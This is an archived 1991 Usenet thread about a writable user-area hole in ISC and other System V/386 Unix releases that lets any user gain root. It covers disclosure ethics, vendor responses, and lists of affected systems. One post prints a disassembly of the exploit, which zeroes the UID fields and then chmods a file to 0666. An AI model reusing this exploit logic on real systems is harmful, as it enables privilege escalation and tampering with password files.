
pax@megasys.com (Garry M. Paxinos) (02/15/91)

In article <27b9fc7e.3f86@petunia.CalPoly.EDU> aschaffe@polyslo.CalPoly.EDU (JedHead) writes:

   Huge kudos going out to the person who alerted the net to the Security
   Hole.. I, too, had some reservations at first about the propriety of
   releasing that information "to the world", but quickly realized that it
   was a sure-fire way to get a reaction from the vendors...

Agreed!!  My hat's off to Joern!

   A 3-day cycle from the "Hey, ISC!" message to an announcement of a free
   bug fix is something to be impressed with..

But I do not agree on this...  considering the original poster apparently 
spent 6 months trying to get ISC to do something about this...

For referneces, here is the statement in the ISC 2.2 release notes on page
10:

' * A new tunable parameter has been added to prevent users from 
    writing to the ublock of ther own processes.  By setting the
    value of UAREAUS and UAREARW to 0 instead of the default,
    1, users can be prevented from changing their effective user
    identifications (UID).  Refer to the "INTERACTIVE UNIX
    Operating System Maintenance Procedures" for more informa-
    tion on setting tunable parameters  '

   Obviously they knew about it in 2.2, and proceded to NOT do anything to 
fix it when they released the 2.2.1 update.   If anything, I am impressed with
their sheer stupidity.   Gee, I'm really glad it only took them 3 days to
admit to a gapping security hole when it was printed in their 2.2 release 
notes almost a year ago...

   We have systems Nuclear Power Plants!   Besides not wanting the general 
operations people to have root access, these systems also have modems!  Need 
I say more?!

    pax.

--
E-Mail:pax@megasys.com    pax@ankh.ftl.fl.us    gmp@pinet.aip.org
USNail:Megasystems, Inc.    2055 South Congress Ave,  Delray Beach,  FL  33445
UUCP  :{gatech!uflorida!novavax!ankh,   mthvax,  shark,   attmail}!megasys!pax
Voice :407-243-2405   Data: 407-243-2407  Fax: 407-243-2408   Telex: 156281499

src@scuzzy.in-berlin.de (Heiko Blume) (02/15/91)

sef@kithrup.COM (Sean Eric Fagan) writes:

>In article <1991Feb13.221259.1462@scuzzy.in-berlin.de> src@scuzzy.in-berlin.de (Heiko Blume) writes:
>>not exactly, for public access to my source archive i've set up
>>a chroot() user that can't write anywhere, unhackable :-)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

>Sorry, that's not the case.  Once you've got root access, you can go through
>and do lots of nasty things, including setting u.u_rdir to something useful,
>like '/'.  Figuring out how to do so is left as an excercise for the reader.

once you've got root access, yes, but you can get root access.
the only thing that that user can do is *read* files, nothing else.
the only commands available are ls, sz, zmore and tar. try figuring
out how to become root with this as a long lasting excercise.
-- 
      Heiko Blume <-+-> src@scuzzy.in-berlin.de <-+-> (+49 30) 691 88 93
                    public source archive [HST V.42bis]:
        scuzzy Any ACU,f 38400 6919520 gin:--gin: nuucp sword: nuucp
                     uucp scuzzy!/src/README /your/home

root@tndsyd.oz.au (the main man) (02/15/91)

Qote from local distributer in Australia:

	"Oh yes I know about that problem, but doesn't it exist in 
	 all UNIX systems ?"

You guys think you got problems !!!!

pax@megasys.com (Garry M. Paxinos) (02/15/91)

In article <6027@unix386.Convergent.COM> mburg@unix386.Convergent.COM (Mike Burg) writes:
   A two sided coin problem...

Quite true..

   From a view of a person who has work for various Unix system houses -
   you can't really blame ISC, ESIX, or any other vendors that current has the
   bug in it's release. I think the blame should be placed on AT&T. They are the
   ones who are (were) shipping the base source with the bug. Most AT&T UNIX
   vendors typically only concentrate on adding more options to the system
   (i.e. X-Windows, more controller card support, networking). They usually
   don't looking into rats mazes like memory managment. Now, look it from the
   vendors eye's - You'd be expecting for AT&T to ship a somewhat "secure" (if
   you can call it that) product, without serious holes like this one. Logical 
   conculsion - concentrate on value and price. But after this, I guess not.
   There's only so much a systems house can concentrate on, and some of them
   are poorly understaffed.

I agree completely on the above, with systems as complex as a full Unix
operating system it is quite likely that some things will slip thru.

HOWEVER, they clearly were aware of the 'gapping hole' when they released
2.2 as it is openly stated in the release notes (and you don't have to be
a kernel hacker to understand it...  I guess it just shows how many people
really read the release notes :-)  

This, coupled with the fact the 2.2.1 update did nothing to close the 'hole' 
would seem to indicate either extreme incompentance or total disregard for 
customer security and any intent on fixing real problems.  Unfortunately, as
they seem to be able to come up with a fix by next Friday (the 22nd), the
later appears to be the case...

If this weren't so insidious a breach of security I would be a little
more tolerant.  But openly stating it in a Release Note almost a year ago
and then do absolutely nothing to fix it, even when they have come out with 
an update since then.  Is this a classic definition of negligence or what?

   ON THE OTHER HAND, since you are buying a product from the vendors, you'd
   *EXPECT THEM* to sell you a stable product. Kinda of like selling you a 
   new car, then having it going out of control because your kid decided to
   change the radio station.

I agree 100%.

   Face it folks, all versions of Unix for the PC have problems of some kind.
   (Just a matter of what size the explosion will be when it goes off in your
   face) It ain't no Ginsu knive offer - ("It dices, it slices, it's a
   mutlitasking OS and a teeth cleaner! And if you order now you'll receive....")

Again, absolutely no argument.  But, alas, it really dosen't apply to this
specific problem.

pax.
--
E-Mail:pax@megasys.com    pax@ankh.ftl.fl.us    gmp@pinet.aip.org
USNail:Megasystems, Inc.    2055 South Congress Ave,  Delray Beach,  FL  33445
UUCP  :{gatech!uflorida!novavax!ankh,   mthvax,  shark,   attmail}!megasys!pax
Voice :407-243-2405   Data: 407-243-2407  Fax: 407-243-2408   Telex: 156281499
          "This is America, Right?!?!?"  member of 2 Live Crew

loc@yrloc.ipsa.reuter.COM (Leigh Clayton) (02/15/91)

 I've seen many many postings with this subject, but I've yet to come
across a description of just what everyone is on about. I run 386ix 2.0.2
so I'm more than academically interested, if I've got the gist of the thread
right. (I *do* have a 387, which in some postings sounds like a good thing).

 Can someone (re) post an exact, factual description of the problem please?
(or at least Email one to me). Thanks

../Leigh

-----------------------------------------------------------
loc@tmsoft.UUCP                     uunet!mnetor!tmsoft!loc
loc@ipsa.reuter.COM                         (Leigh Clayton)

cpcahil@virtech.uucp (Conor P. Cahill) (02/15/91)

mburg@unix386.Convergent.COM (Mike Burg) writes:
>
>From a view of a person who has work for various Unix system houses -
>you can't really blame ISC, ESIX, or any other vendors that current has the
>bug in it's release. I think the blame should be placed on AT&T. They are the
>ones who are (were) shipping the base source with the bug. Most AT&T UNIX

I agree that AT&T should take a major portion of the blame for this bug,
especially in early releases of the OS.  HOWEVER, ISC plainly knew about
the but when it released 2.2 and instead of fixing the problem they threw
together a kludge that would only work if you had a numeric co-processor 
installed in the machine.

That was what I consider a very big *mistake* on ISC's part (I would hazard 
a *GUESS* that it was probably a consious decision that the time that would 
be spent to fix the problem that was relatively unknown could be better 
spent fixing other problems.  Note that I would strongly disagree with this
decision).

That said, ISC (and reportedly ESIX) have reacted quickly and promissed a fix
disk for each version of the OS RSN.  ESIX has reportedly said it will post
the fix to this newsgroup.  ISC *should* do the same, but has said that they
will only release the fix via thier normal fixdisk distribution mechanism.

Now, as to the original posting about the bug -

	1. From what you said (you tried to get ISC to fix it for the past
	   6 months) I agree with your action of posting about the problem 
	   to the net so that you could force ISC to fix the problem.  This
	   was apparently needed.

	2. I wholeheartly DISAGREE with you posting the source code which
	   performs the security bypass.  You could have just posted the
	   uuencoded binary which would have been enough to prove your point
	   without making it extremely easy for any two bit user to obtain
	   privileged access.  Yes a dedicated hacker could have decoded
	   your explanation and/or the binary and figure out how to replicate
	   your code, but the number of those is MUCH less than the number
	   of people who can now violate the security of the system using
	   your posted code.

	   POSTING THE CODE WAS DEAD WRONG. 

Enough said.
-- 
Conor P. Cahill            (703)430-9247        Virtual Technologies, Inc.
uunet!virtech!cpcahil                           46030 Manekin Plaza, Suite 160
                                                Sterling, VA 22170 

ry@cbnewsl.att.com (ryerson.schwark) (02/15/91)

In article <WCR.91Feb14012138@tree.tree.metrolink.com> wcr@tree.metrolink.com (W.c. Rothanburg) writes:
>
>The only problem with setting UAREAUS and UAREAW to zero is you
>cannot do any floating point operations without a co-processor.  
>(I don't have a co-processor to try it with... <sigh>)
>
>We (at Metro Link) have found the AT&T Unix/386 appears to have the
>same problem.  (I heard this second hand and don't know from whom.)  
>
>Bill


Would you check which release you're running?  We've checked our 3.2
systems and none of them have this problem, if you do, I'd like to
hear about it. 


Ry Schwark
AT&T UNIX System Laboratories

ry@cbnewsl.att.com (ryerson.schwark) (02/15/91)

In article <6027@unix386.Convergent.COM> mburg@unix386.Convergent.COM (Mike Burg) writes:
>From a view of a person who has work for various Unix system houses -
>you can't really blame ISC, ESIX, or any other vendors that current has the
>bug in it's release. I think the blame should be placed on AT&T. They are the
>ones who are (were) shipping the base source with the bug. Most AT&T UNIX
>vendors typically only concentrate on adding more options to the system
>(i.e. X-Windows, more controller card support, networking). They usually
>don't looking into rats mazes like memory managment. Now, look it from the
>vendors eye's - You'd be expecting for AT&T to ship a somewhat "secure" (if
>you can call it that) product, without serious holes like this one. Logical 
>conculsion - concentrate on value and price. But after this, I guess not.
>There's only so much a systems house can concentrate on, and some of them
>are poorly understaffed.


We did fix the bug in our update tape to 3.2.  We take these problems
very seriously.  Our support department has verified that the problem
doesn't occur on 3.2.1 systems or later, including Release 4.

Ry Schwark
AT&T UNIX System Laboratories

weave@chopin.udel.edu (Ken Weaverling) (02/15/91)

(Some info for PRIME customers below, but first.....)

In article <1991Feb15.134715.16979@virtech.uucp> 
      cpcahil@virtech.uucp (Conor P. Cahill) writes:
>
>	2. I wholeheartly DISAGREE with you posting the source code which
>	   performs the security bypass.  You could have just posted the
>	   uuencoded binary which would have been enough to prove your point
>	   without making it extremely easy for any two bit user to obtain
>	   privileged access.

I agree, and the binary could have proven the point with out making 
passwd and shadow 666. Therefore, if a curious user got hold of it and
ran it without really wanting to do damage, the files could be left 666
for someone else to play with.

Another alternative could have been a posting such as: "Hey, take a 
look at <sys/user.h> -- guess what, a user can WRITE to those fields!"

That would have the same shock value for sysadmins, then I could do 
*something* to buy myself *some* time like make user.h 600 or make it
a FIFO so a compile that attempts to #include it would hang or even
if I was real industrious, put a daemon on the other end of the FIFO
which could alert me if someone opened it.  

I'm not upset with the fellow who did the post. In the end, he will have
done us all a great favour. It's just that I feel naked and helpless
right now....

BTW, the bug appears on the Prime EXL 300 and matchbox series running
Prime's version of SYSV/386.  I called Prime and they opened a 
Priority SPAR on it. Any Prime customers should monitor the Prime
diagnostic database for the fix announcement. SPAR # is 4052031

-- 
>>>---> Ken Weaverling  >>>---->  weave@brahms.udel.edu

larry@nstar.rn.com (Larry Snyder) (02/16/91)

davidg@aegis.UUCP (Dave McLane) writes:

>New, but related subject: when ISC fires up after the login it puts
>this really grotesque series of lines about copyrights and such
>which I would like to get rid of. Anybody know if this is possible?

yes  - find a replacement for /bin/login - or edit the one that comes
with 386/ix

-- 
   Larry Snyder, NSTAR Public Access Unix 219-289-0287 (HST/PEP/V.32/v.42bis)
                        regional UUCP mapping coordinator 
               {larry@nstar.rn.com, ..!uunet!nstar.rn.com!larry}

peter@ficc.ferranti.com (Peter da Silva) (02/16/91)

In article <1991Feb13.204408.15621@kithrup.COM> sef@kithrup.COM (Sean Eric Fagan) writes:
> In article <1739@svin02.info.win.tue.nl> debra@info.win.tue.nl writes:
> >This (and other postings) suggests that the problem would be found
> >in the more generic sVr3.2 from AT&T.

> It was.  Note that it was in the *original* release of 3.2 for the '386.

It's not in the Bell Tech V.3.2, which is pretty much a straight copy
of the AT&T V.3.2. It is my understanding that the ISC V.3.2 at least
contains a fair amount of V.3.x (x<=1) code in it, and the ESIX product
is based on the ISC product.
-- 
Peter da Silva.  `-_-'  peter@ferranti.com
+1 713 274 5180.  'U`  "Have you hugged your wolf today?"

bill@unixland.uucp (Bill Heiser) (02/16/91)

In article <16434@chopin.udel.edu> weave@chopin.udel.edu (Ken Weaverling) writes:
>
>That would have the same shock value for sysadmins, then I could do 
>*something* to buy myself *some* time like make user.h 600 or make it

Are you suggesting that making user.h is a "work-around" for the problem?
It would seem that anyone dedicated to using this "door" would just 
use an equivalent file of their own from another system.  Or can this be
done?


-- 
home:	...!{uunet,bloom-beacon,esegue}!world!unixland!bill
	bill@unixland.uucp              The Think_Tank BBS & Public Access Unix
508-655-3848 (2400)   508-651-8723 (9600-HST)   508-651-8733 (9600-PEP-V32)
other:	heiser@world.std.com

jrh@mustang.dell.com (James Howard) (02/16/91)

In article <1991Feb15.035643.5542@jwt.UUCP>, john@jwt.UUCP (John
Temples) writes:
> In article <15126@uudell.dell.com> jrh@mustang.dell.com (James Howard)
writes:
> >I have tried the program posted earlier on both Dell 
> >SVR3.2 (which is ISC 2.0.2 based) and Dell SVR4.0 (not in any way 
> >related to ISC ;-) ).  It core dumps faithfully on both.  
> 
> Based on what I've read here (not just in regards to the security
> hole), I'm starting to get the feeling that Dell is the only UNIX
> vendor that has its act together.  I think I might just buy Dell's
> SVR4.0 even though upgrading my ESIX will probably be cheaper.
> -- 
> John W. Temples -- john@jwt.UUCP (uunet!jwt!john)

Let me attempt to correct an oversight in my original post.  I tested the 
posted source on a 3.2 machine running here internally, but it was a 486
machine, not a 386.  It did not display the bug, but of course, it did
have the 486 internal equivalent of a 387, which might have affected the
test.  To be sure, I later tried it on several 386 systems without a 
mathco, and it still did not display the bug.   I should have been more
careful before posting that it did not occur, although it turned out to
be true anyway. 

It has been posted elsewhere in this thread that AT&T 3.2.1 does not 
have this bug.  Dell UNIX 1.1 (which is generally described as based on
ISC 2.0.2 sources) was a merge of ISC, AT&T 3.2.1, and Dell 1.0 code
bases.  The likely explanation for why Dell does not display a bug
in a UNIX release based on ISC source, is that ISC did not merge in all
of the AT&T fixes for 3.2.1, pure supposition on my part however.

So, now for the facts, right?   The following machine configurations were
tested, and did not display the bug.  The test was done by compiling the
source as posted here on USENET.  

System		CPU / MathCo		OS / Release
-------------------------------------------------------
Dell 325	386 / NONE		Dell SVR3.2 / 1.1
Dell 325	386 / 387		Dell SVR3.2 / 1.1
Dell 425E	486 / Builtin		Dell SVR3.2 / 1.1
Dell 325P	386 / 387		Dell SVR4.0 / 2.0
Dell 325P	386 / NONE		Dell SVR4.0 / 2.0
Dell 325	386 / NONE		Dell SVR4.0 / 2.0
Dell 425TE	486 / Builtin		Dell SVR4.0 / 2.0

I believe this covers the cases where it might be a problem, as well
as a fairly wide range of hardware.  If a Dell customer has the bug,
it might be with Dell UNIX 1.0, which did not have the 3.2.1 fixes
applied.  Such a customer should contact Dell Technical Support or send
mail to support@dell.dell.com (or support@uudell.dell.com) to inquire as
to bug a fix.  I did not test Dell UNIX 1.0, because I could not locate
a system in house running the older version software.  I would very much
like to hear from anyone with Dell UNIX that is experiencing the bug
described above.


James Howard        Dell Computer Corp.        !'s:uunet!dell!mustang!jrh
(512) 343-3480      9505 Arboretum Blvd        @'s:jrh@mustang.dell.com
                    Austin, TX 78759-7299   

cpcahil@virtech.uucp (Conor P. Cahill) (02/16/91)

loc@yrloc.ipsa.reuter.COM (Leigh Clayton) writes:
> I've seen many many postings with this subject, but I've yet to come
>across a description of just what everyone is on about. I run 386ix 2.0.2

The problem is as follows:

The user structure, which is used by the kernel to store process 
information including the user/group that is running the process, is 
writable by the programs themselves.  Since a program can write data
to that area, they can make the system believe that they are actually
being run by the super user, thereby gaining full access to the 
entire system.

In short, any user with access to a compiler can make themselves
root with just a few lines of somewhat simple C code (although if it hadn't
been posted, it probably wouldn't have been that simple for the average
programmer to do it).

This problem is known to be present in the following systems:

	Interactive 2.0.2
	Interactive 2.2
	ESIX
	AT&T Rel 3.2 (fixed in 3.2.1)

The problem is known to NOT exist in the following systems:

	Dell Unix (both 3.2 and 4.0)
	SCO UNIX

There is a workaround for Interactive 2.2 if you have a 387 installed (turn
off UAREAW and UAREAS in /etc/conf/cf.d/stune).

Both Interactive and ESIX have said that a fix disk would be forthcomming.

-- 
Conor P. Cahill            (703)430-9247        Virtual Technologies, Inc.
uunet!virtech!cpcahil                           46030 Manekin Plaza, Suite 160
                                                Sterling, VA 22170 

mike (02/16/91)

In an article, unix386.Convergent.COM!mburg (Mike Burg) writes:
>In article <27B93F44.5606@tct.uucp>, chip@tct.uucp (Chip Salzenberg) writes:
>> According to jpp@specialix.co.uk (John Pettitt):
>> >We have confirmed that this does indeed work on ISC 2.2 and that SCO
>> >unix does `the right thing' (tm) and core dumps the application.
>> 
>> It is good to see that SCO's engineers, unlike those at ISC and
>> Everex, have an effective grasp on the basic principles of memory
>> protection covered in the first semester of OS design class.
>
>A two sided coin problem...
>
>From a view of a person who has work for various Unix system houses -
>you can't really blame ISC, ESIX, or any other vendors that current has the
>bug in it's release.  [...]

Sure I can.  I shelled out a _lot_ of dollars for my operating system.
I have _every_ right to expect my software to be bug-free.  Now, as a
programmer, I know this isn't reality, but in turn, this doesn't justify
it either.

>I think the blame should be placed on AT&T. They are the
>ones who are (were) shipping the base source with the bug. Most AT&T UNIX
>vendors typically only concentrate on adding more options to the system
>(i.e. X-Windows, more controller card support, networking). They usually
>don't looking into rats mazes like memory managment.  Now, look it from the
>vendors eye's - You'd be expecting for AT&T to ship a somewhat "secure" (if
>you can call it that) product, without serious holes like this one. [...]

Bullocks.  The simple fact that it has come from AT&T does not mean it
excuses a company who is going to refurbish and _resell_ it from going
through it with a fine tooth comb.  Once it's out that door with that
company's name on it, it's not AT&T's problem anymore.

>Logical
>conculsion - concentrate on value and price. But after this, I guess not.
>There's only so much a systems house can concentrate on, and some of them
>are poorly understaffed.

Poor management is not the problem of the customer.  Don't expect me to
whip out my violins and start playing, when not so long ago, I handed
them a hefty check.

>ON THE OTHER HAND, since you are buying a product from the vendors, you'd
>*EXPECT THEM* to sell you a stable product. Kinda of like selling you a 
>new car, then having it going out of control because your kid decided to
>change the radio station.
>
>Face it folks, all versions of Unix for the PC have problems of some kind.
>(Just a matter of what size the explosion will be when it goes off in your
>face) It ain't no Ginsu knive offer - ("It dices, it slices, it's a
>mutlitasking OS and a teeth cleaner! And if you order now you'll receive....")

True enough, but this no reason for the user to not _expect_ a bug-free
version.  Yes, it is pie-in-the-sky, but every company's objective should
be to provide a bug-free product (not a product that has known bugs, or
has them as "features").

How about forcing them to give prior disclosure of all known bugs, _outside_
of the shrink wrap?  How about forcing them to provide _free_ bug-fixes on
a regular basis?  How do you force them?  Don't buy until they do it.  No
company is motivated to change unless it socks 'em in the wallet.

Of course, when you are using PD or freely redistributable code, then you
rolls your dices and takes your chances.  The up side there is that (usually)
you at least have the source.

Now there's an idea!  How about distributing the _source_ with these systems?
Seems to me that long, long ago in a land far, far way, that this was done ...

-- 
Michael Stefanik, MGI Inc., Los Angeles| Opinions stated are not even my own.
Title of the week: Systems Engineer    | UUCP: ...!uunet!bria!mike
-------------------------------------------------------------------------------
Remember folks: If you can't flame MS-DOS, then what _can_ you flame?

davidg@aegis.UUCP (Dave McLane) (02/16/91)

larry@nstar.rn.com (Larry Snyder) writes:

> davidg@aegis.UUCP (Dave McLane) writes:
>
> >New, but related subject: when ISC fires up after the login it puts
> >this really grotesque series of lines about copyrights and such
> >which I would like to get rid of. Anybody know if this is possible?
>
> yes  - find a replacement for /bin/login - or edit the one that comes
> with 386/ix

Of course <smile>. Login is what shows up under ps -eal when
somebody is logging in. Thanks for pointing out the (almost) obvious!

Being new to UNIX (as you can probably guess) I don't know how to
edit binary stuff but fortunately I'm running VPIX and am a long
time user of SYMDEB.EXE which worked fine.

Actually, I run under VPIX most of the time as I have gotten used
to having NDE (Norton Command Line Editor) which lets me pop up the last
20 commands and edit them....

--Dave

sef@kithrup.COM (Sean Eric Fagan) (02/16/91)

In article <15185@uudell.dell.com> jrh@mustang.dell.com (James Howard) writes:
>So, now for the facts, right?   The following machine configurations were
>tested, and did not display the bug.  The test was done by compiling the
>source as posted here on USENET.  

I tested the program on kithrup, once with the fpu recognized, once with the
fpu disable (booting with 'ignorefpu' at the boot: prompt).  It failed both
times, as I'd expected.  (Hey, I was being paranoid before I posted, what
can I say? 8-))  This was under SCO UNIX 3.2v2.

Hmm... I think I shall ask someone about 386BSD 8-).

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

kherron@ms.uky.edu (Kenneth Herron) (02/16/91)

cpcahil@virtech.uucp (Conor P. Cahill) writes:

>This problem is known to be present in the following systems:

> [...]
>	AT&T Rel 3.2 (fixed in 3.2.1)

Sigh.  Maybe I'm the only one in the whole world, but the problem exists 
on MY AT&T 3.2.1 system.  It's AT&T hardware, too (no coprocessor).  After 
all these reports of core dumps on AT&T unix I went back and tried the test 
program again.  It works like a charm :-(

Maybe it's dependent on what random packages are linked into the
kernal...?
-- 
Kenneth Herron                                            kherron@ms.uky.edu
University of Kentucky                                        (606) 257-2975
Department of Mathematics 
                                "Never trust gimmicky gadgets" -- the Doctor

ruiu@dragos.uucp (dragos) (02/16/91)

I missed the beginning of this thread, but I'm quite alarmed (!) by its
implications. Could someone mail the aforementioned bombshell to root
here ?  There are several systems I should check.
-- 
Dragos Ruiu (ruiu@dragos.uucp)  alberta!dragos!ruiu    Copyright(c) 1991
HP, IDACOM division.            idacom!drag

jdeitch@jadpc.cts.com (Jim Deitch) (02/16/91)

In article <1991Feb13.220110.1314@scuzzy.in-berlin.de> src@scuzzy.in-berlin.de (Heiko Blume) writes:
>sef@kithrup.COM (Sean Eric Fagan) writes:
>>Get SCO.  It does not have this "feature," and still manages to support
>>Weitek coprocessors (the coprocessor the original poster was referring to, I
>>believe).  (The Weitek's use memory for registers and, obviously, need to be
>>able to write them.  The weitek registers are stuck in the upage, and
>>happen, in apparantly every 3.2 save SCO's, to be in the same page as the
>>uid stuff.  *Bad*.  *Very* bad.)
>
>there's no problem with ISC if you have any co-processor. the problem is the
>floating point emulation that runs in user space and needs to write the u area. 
>
>i hope ISC will send me a 'bug fix' in the form of a 33MHz 80387 :-)

Me Too!

One quick question though,
  I tried to fix the problem temporarily by setting UAREARW to 0 as
was posted.  I rebult the kernel and all was well, until cnews tried
to run.  I got a core dump from sendbatches.  Also the dfspace utility
would not work.  Anyone else seen this?  I am running ISC 2.2 w/o a
coprocessor.  Do I also have to set UAREAUS to 0 to make this "fix"
work?

Jim

-- 
ARPANET:    jadpc!jdeitch@nosc.mil
INTERNET:   jdeitch@jadpc.cts.com
UUCP:	    nosc!jadpc!jdeitch

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/16/91)

cpcahil@virtech.uucp (Conor P. Cahill) writes:
>	2. I wholeheartly DISAGREE with you posting the source code which
>	   performs the security bypass.  You could have just posted the
>	   uuencoded binary which would have been enough to prove your point
>	   without making it extremely easy for any two bit user to obtain
>	   privileged access.  Yes a dedicated hacker could have decoded
>	   your explanation and/or the binary and figure out how to replicate
>	   your code, but the number of those is MUCH less than the number
>	   of people who can now violate the security of the system using
>	   your posted code.
>	   POSTING THE CODE WAS DEAD WRONG. 
Everyone being able to use debugger or the disassembler, will be able
to get the information out of the binary !

lets look at the disassembly (done on isc 2.21):

--- BEGINS HERE ---

		****   DISASSEMBLER  ****


disassembly for toete

section	.text
[startup code deleted]
	 11e:  c7 45 fc 00 00 00 e0   movl   $0xe0000000,0xfc(%ebp)
	 125:  8b 45 fc               movl   0xfc(%ebp),%eax
	 128:  66 c7 80 ea 10 00 00 00 00 movw   $0x0,0x10ea(%eax)
	 131:  8b 45 fc               movl   0xfc(%ebp),%eax
	 134:  66 c7 80 ec 10 00 00 00 00 movw   $0x0,0x10ec(%eax)
	 13d:  8b 45 fc               movl   0xfc(%ebp),%eax
	 140:  66 c7 80 ee 10 00 00 00 00 movw   $0x0,0x10ee(%eax)
	 149:  8b 45 fc               movl   0xfc(%ebp),%eax
	 14c:  66 c7 80 f0 10 00 00 00 00 movw   $0x0,0x10f0(%eax)
	 155:  68 b6 01 00 00         pushl  $0x1b6
	 15a:  68 a0 03 40 00         pushl  $0x4003a0
	 15f:  e8 0c 00 00 00         call   0xc <170>		/* CHMOD */
	 164:  83 c4 08               addl   $0x8,%esp
	 167:  c9                     leave  
	 168:  c3                     ret    
[Library functions deleted]

Don't you think, this is enough for anyone to see, whats going on ?

jl
-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

wcr@tree.metrolink.com (W.c. Rothanburg) (02/16/91)

In article <1991Feb15.152036.17557@cbnewsl.att.com> ry@cbnewsl.att.com (ryerson.schwark) writes:

   >The only problem with setting UAREAUS and UAREAW to zero is you
   >cannot do any floating point operations without a co-processor.  
   >(I don't have a co-processor to try it with... <sigh>)
   >
   >We (at Metro Link) have found the AT&T Unix/386 appears to have the
   >same problem.  (I heard this second hand and don't know from whom.)  
   >
   Would you check which release you're running?  We've checked our 3.2
   systems and none of them have this problem, if you do, I'd like to
   hear about it. 

I've heard this information second hand (unfortunately.)  It was not
a system which we run.  When we get calls about our products, 
sometimes the discussions also include other topics, including
this one.  Is there a specific (older?) release that might have this
problem?  

Bill

--
Who  : Metro Link, Inc.
What : X11.R4. for ISC Unix 386/ix, SCO Unix/386, and Everex ESIX
Where: 2213 West Mc Nab Road, Pompano Beach,FL 33069
Sales: sales@metrolink.com
Email: wcr@metrolink.com
Phone: +1 305 970 7353 x927
Fax  : +1 305 970 7351

rwmira01@ulkyvx.bitnet (Rob Miracle) (02/17/91)

In article <1991Feb13.170133.28585@cfctech.cfc.com>, norm@cfctech.cfc.com (Norman J. Meluch) writes:
> Well that uuencoded program failed (Memory Fault) on my AT&T Sys V/386 3.2.1.
> However, I have no compiler to try the source.  Anyone else try it?

AT&T Sys V/386 3.2.2 and 3.2.3 both core dumped as they should, both on the
binary and on compiled code.  I guess we are safe from this one.

Rob
-- 
Rob Miracle              | Bitnet   : RWMIRA01@ULKYVX    CIS: 74216,3134
Programmer/Analyst-III   | INTERNET : rwmira01%ulkyvx.bitnet@cunyvm.cuny.edu
University of Louisville | UUCP     : ...psuvax1!ulkyvx.bitnet!rwmira01
"Remember, no matter where you go, there you are!" -- Buckaroo Bonzai

bill@unixland.uucp (Bill Heiser) (02/17/91)

In article <K47NHAI@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>davidg@aegis.UUCP (Dave McLane) writes:
>>New, but related subject: when ISC fires up after the login it puts
>>this really grotesque series of lines about copyrights and such
>>which I would like to get rid of. Anybody know if this is possible?
>use a binary editor and patch zero-bytes at beginning of the copyright
>strings, they will never be seen again..
>
Could something similar be done to "fix" something in the kernel
to disallow that "writing to user area" bug?  It seems that ISC
has a configurable parameter, but Esix does not.  


-- 
home:	...!{uunet,bloom-beacon,esegue}!world!unixland!bill
	bill@unixland.uucp              The Think_Tank BBS & Public Access Unix
508-655-3848 (2400)   508-651-8723 (9600-HST)   508-651-8733 (9600-PEP-V32)
other:	heiser@world.std.com

bill@unixland.uucp (Bill Heiser) (02/17/91)

In article <kBTHX1w163w@aegis.or.jp> davidg@aegis.UUCP (Dave McLane) writes:
>edit binary stuff but fortunately I'm running VPIX and am a long
>time user of SYMDEB.EXE which worked fine.

This is a good question (for those of us who don't know) -- how does
one edit binaries in Unix?  Is there a utility like Norton out there
(yes, I know Norton is available for ISC, but I'm running Esix).

Thanks!

Bill

-- 
home:	...!{uunet,bloom-beacon,esegue}!world!unixland!bill
	bill@unixland.uucp              The Think_Tank BBS & Public Access Unix
508-655-3848 (2400)   508-651-8723 (9600-HST)   508-651-8733 (9600-PEP-V32)
other:	heiser@world.std.com

weave@chopin.udel.edu (Ken Weaverling) (02/17/91)

In article <1991Feb15.234035.8378@unixland.uucp> bill@unixland.uucp (Bill Heiser) writes:
>In article <16434@chopin.udel.edu> weave@chopin.udel.edu (Ken Weaverling) writes:
>>
>>That would have the same shock value for sysadmins, then I could do 
>>*something* to buy myself *some* time like make user.h 600 or make it
>
>Are you suggesting that making user.h is a "work-around" for the problem?

No. Obviously they could probably get the file elsewhere, but it might
slow them down until I can get a fix from my vendor (hopefully any day
now...).  The students on my systems that I fear are the ones that know
just enough to be dangerous.  The truly bright ones that are also
mischevious I know and already keep an eye on!

-- 
>>>---> Ken Weaverling  >>>---->  weave@brahms.udel.edu

james@bigtex.cactus.org (James Van Artsdalen) (02/17/91)

In <1991Feb15.134715.16979@virtech.uucp>, cpcahil@virtech.uucp
	(Conor P. Cahill) wrote:

> I agree that AT&T should take a major portion of the blame for this bug,
> especially in early releases of the OS.

I would be careful about placing blame at this point.  I have yet to
see a strong pattern develop in the postings: clearly ISC has the bug,
and it seems Esix does, but current Dell SysVr3 apparently doesn't.
There is at least one claim that current AT&T doesn't, and a few that
unspecified versions of AT&T does.

Key point: some reports say that the 387 emulation actually crashes in
systems if the u block is protected.  I don't know if the source to
the emulator is in the "source" package one receives from AT&T.
Fixing the bug might be non-trivial if it is in the emulator, and you
don't have source for the emulator.

> 1. From what you said (you tried to get ISC to fix it for the past
>    6 months) I agree with your action of posting about the problem 
>    to the net so that you could force ISC to fix the problem.

Absolutely.  Getting some programmers to fix bugs is like pulling
teeth.  People will spend hours describing why they don't want to fix
a bug when the actual fix might take fifteen minutes.

> 2. I wholeheartly DISAGREE with you posting the source code which
>    performs the security bypass. [...]  Yes a dedicated hacker could
>    have decoded your explanation and/or the binary and figure out how
>    to replicate your code, [...]

dis(1) is not terribly subtle or difficult to use.  It only takes one
person to post a dis(1) trace.

>    but the number of those is MUCH less than the number
>    of people who can now violate the security of the system using
>    your posted code.

The likelyhood that the vendor will actually fix a bug is proportional
to the number of frantic phone calls and cancelled orders they
receive.  The greater the number of people whose system is now
painfully at risk, the sooner vendors will deliver a fix.
-- 
James R. Van Artsdalen          james@bigtex.cactus.org   "Live Free or Die"
Dell Computer Co    9505 Arboretum Blvd Austin TX 78759         512-338-8789

cpcahil@virtech.uucp (Conor P. Cahill) (02/17/91)

lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>cpcahil@virtech.uucp (Conor P. Cahill) writes:
>>	   POSTING THE CODE WAS DEAD WRONG. 
>Everyone being able to use debugger or the disassembler, will be able
>to get the information out of the binary !

Yes, but that requires the following:

	1. the desire to spend the time doing it.
	2. the ability to read and understand the assembly language
	3. the ability to turn that back into a c program
	4. the knowledge that there is a disassembler

